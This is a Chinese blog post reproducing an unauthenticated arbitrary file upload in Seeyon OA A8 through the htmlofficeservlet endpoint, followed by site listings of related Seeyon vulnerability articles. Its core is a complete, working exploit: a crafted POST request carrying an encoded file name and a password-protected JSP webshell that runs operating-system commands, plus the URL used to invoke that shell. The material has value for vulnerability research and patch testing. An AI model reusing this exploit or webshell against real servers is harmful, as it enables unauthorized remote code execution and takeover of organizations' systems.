致远OA文件写入

最新推荐文章于 2024-05-27 11:47:33 发布
最新推荐文章于 2024-05-27 11:47:33 发布
阅读量2.3k 收藏 4
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44508748/article/details/109898055
版权

该系统的漏洞点在于致远OA-A8系统的Servlet接口暴露,安全过滤处理措施不足,使得用户在无需认证的情况下实现任意文件上传。
攻击者利用该漏洞,可在未授权的情况下,远程发送精心构造的网站后门文件,从而获取目标服务器权限,在目标服务器上执行任意代码漏洞。

影响范围:

致远A8-V5协同管理软件 V6.1sp1
致远A8+协同管理软件 V7.0、V7.0sp1、V7.0sp2、V7.0sp3
致远A8+协同管理软件 V7.1
上面是CNVD发布的漏洞影响范围,但我在V6.1_SP2版本依然测试成功,不知道为什么。

漏洞复现

1.访问/seeyon/htmlofficeservlet
如果出现下图所示的内容,表示存在漏洞
在这里插入图片描述
2.构造PoC

POST /seeyon/htmlofficeservlet HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=AECA75BBED13D7C698B3D4AAE6051BEE; loginPageURL=
x-forwarded-for: 1.1.1.1'
Connection: close
Content-Length: 1117

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

3.上传
在这里插入图片描述
4.连接:

http://z.z.z.z/seeyon//test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+ipconfig

在这里插入图片描述

Min1996
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
PeiQi0#PeiQi-WIKI-Book#致远OA A6 createMysql.jsp 数据库敏感信息泄露1
07-25
致远OA A6 createMysql.jsp 数据库敏感信息泄露漏洞描述致远OA A6 存在数据库敏感信息泄露,攻击者可以通过访问特定的URL获取数据库账户以
致远OA敏感信息泄露漏洞合集(含批量检测POC)
今天是几号的博客
03-21 7824
用友致远OA协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、规范管理、资源整合、运营管控等难题,是组织管理的最佳实践。产品系列: A3、A6、A8品牌: 用友对象: 微型、小型企业、企业部门级。
【nday】HVV 致远OA漏洞合集
最新发布
伏一
05-27 2233
然后调用未授权的文件上传接口上传webshell文件,webshell地址: /seeyon/apps_res/addressbook/images/config.jspx。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。app="致远互联-OA" && title="V8.0SP2"body="yyoa" && app="致远互联-OA"title="致远A8+协同管理软件.A6"
致远OA文件上传漏洞(含批量检测POC)
今天是几号的博客
03-21 1万+
由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA A6、A8A8N (V8.0SP2,V8.1,V8.1SP1)致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。致远OA G6、G6N (V8.1、V8.1SP1)。致远OA V6.0、V6.1SP1、V6.1SP2。致远OA V7.1、V7.1SP1。
致远a8 java_致远A8任意文件写入漏洞_getshell_exp
weixin_42311000的博客
02-13 1556
1 #coding=utf-82 importsys3 importrequests45 defencode(origin_bytes):6 """7 重构 base64 编码函数8 """9 #将每一位bytes转换为二进制字符串10 base64_charset = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05...
致远OA A8 htmlofficeservlet 任意文件上传漏洞 漏洞复现
Boom!脑洞大爆炸的博客
11-11 6292
致远OA A8 htmlofficeservlet 任意文件上传漏洞 漏洞复现
致远OA上传文件、附件方法
04-02
本篇文章将重点讲解如何在致远OA系统中通过Java代码实现文件上传以及获取附件ID的操作,以便于后续的表单提交。 首先,我们来理解一下“附件ID”。在OA系统中,每个上传的文件都会被赋予一个唯一的ID,这个ID在后续...
致远OA 数据字典
05-15
致远OA A8 数据字典 基本通用A8系列的OA平台数据库。
致远OA任意文件下载1
08-08
致远OA任意文件下载漏洞 致远OA是一款由北京致远互联软件股份有限公司研发的办公系统,旨在为企业提供一站式的办公解决方案。然而,在致远OA的webmail.do文件中存在一个任意文件下载漏洞,攻击者可以通过修改...
致远OA的DEMO项目
03-14
"致远OA的DEMO项目"是一个用于展示和学习致远OA系统功能的实际操作环境。这个DEMO项目可能包含了完整的业务流程、角色设定、模块配置等,为用户提供了一个直观了解和体验致远OA系统的机会。在"seeyon_v5_demo-master...
致远OA 6.1SP1 数据字典
11-11
致远OA 数据字典 6.1SP1 致远OA数据维护致远OA 数据字典 6.1SP1 致远OA数据维护
神兵利器 | HW常见OA利用工具(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
04-13 630
常见OA漏洞利用检测工具Tools-1Tools-2Tools-3后台回复tools,获取工具。
致远A8+数据库账密信息泄露
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
08-04 1411
致远A8+是中国致远信息技术股份有限公司(Inspur)开发的一款企业级服务器产品。作为致远公司的旗舰机型,A8+可提供高性能、可靠性和可扩展性,适用于各种企业级应用和数据中心环境。致远A8+全版本存在数据库账号密码读取漏洞。致远A8+(V7.0) SP1-SP3。
实战渗透致远OA系统多版本Getshell漏洞复现
Adminxe的博客
05-09 7754
一、前言 去北京的这几天,旁边的Az师傅在疯狂的刷着他所期待的edu证书。某一次,就碰到致远OA的站点,因为之前也没复现过,我就按照自己的思路给他说,之前拿OA这种站点,一般就是爆破用户的弱口令,例如密码:123456这种,或者说找一下历史exp,然后一番尝试之后,弱口令无果,只能另寻出路,回到EXP,这次直接实战起来,还是有点手痒,也跟着操作了一番,在这里拿到了Az师傅的原图,来写一篇文章。 二、漏洞介绍 致远 A8+ 某些版本系统,存在远程任意文件上传文件上传漏洞,并且无需登录即可触发。攻击者..
致远OA漏洞复现
热门推荐
混子
12-31 4万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
【1day】致远OA系统A6版本敏感信息泄漏漏洞学习(4个)
记录并分享学习安全的知识点..
05-04 6839
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、分类 二、致远OA A6 config.jsp 敏感信息泄漏漏洞 (一)概述 (二)漏洞复现 三、致远OA A6 initDataAssess.jsp 用户敏感信息泄露漏洞 (一)概述 (二)漏洞复现 四、致远OA A6 createMysql.jsp 数据库敏感信息泄露漏洞 (一)概述 (二)漏洞复现 五、致远OA A6 DownExcelBeanServlet 用户敏感信息泄露 (一)概述 (.
致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现
Boom!脑洞大爆炸的博客
11-11 4625
致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现
致远OA A6 员工敏感信息泄露
qq_42660246的博客
04-26 7924
致远OA A6 员工敏感信息泄露 1.漏洞描述 seeyon OA A6版本存在敏感信息泄露漏洞,攻击者可构造payload,获取敏感信息。 2.复现过程 fofa:app=“致远A6” payload:/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 浏览器访问https://IP:PORT/yyoa/DownExcelBeanServlet?contenttype=use
致远OA漏洞学习——A6版本Session泄漏伪造漏洞
记录并分享学习安全的知识点..
05-08 2745
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞复现 1.获取到所有用户的SessionID ,请求: 2.开始进行伪装,bp遍历替换其中一个Session值: 3.bp开始抓包放包得到如下页面: 4.访问/yyoa/portal/portalIndex.jsp进入首页 一、概述 通过使用存在漏洞的请求时,会回显所有在线用户的Session值,导致出现任意登录的情况,漏洞使用前提是必须系统是有人登录的。 二...
致远OA文件上传漏洞
07-29
致远OA存在文件上传漏洞,攻击者可以通过调用文件上传接口上传恶意文件,从而执行任意系统命令并控制目标服务器。\[2\]\[3\]该漏洞影响范围包括致远OA V8.0、V7.1、V7.0、V6.0、V6.1以及致远OA G6等版本。\[1\]攻击者可以通过构造精心设计的数据向目标服务器写入任意文件,并在写入成功后执行任意系统命令。这个漏洞的危害性非常高,因此建议用户及时升级致远OA的版本或者采取其他安全措施来防止此漏洞的利用。 #### 引用[.reference_title] - *1* [致远OA ajax.do 任意文件上传 (CNVD-2021-01627) 漏洞复现](https://blog.csdn.net/qq2539879928/article/details/127811719)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现](https://blog.csdn.net/qq2539879928/article/details/127811791)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [致远OA A8 htmlofficeservlet 任意文件上传漏洞 漏洞复现](https://blog.csdn.net/qq2539879928/article/details/127811833)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值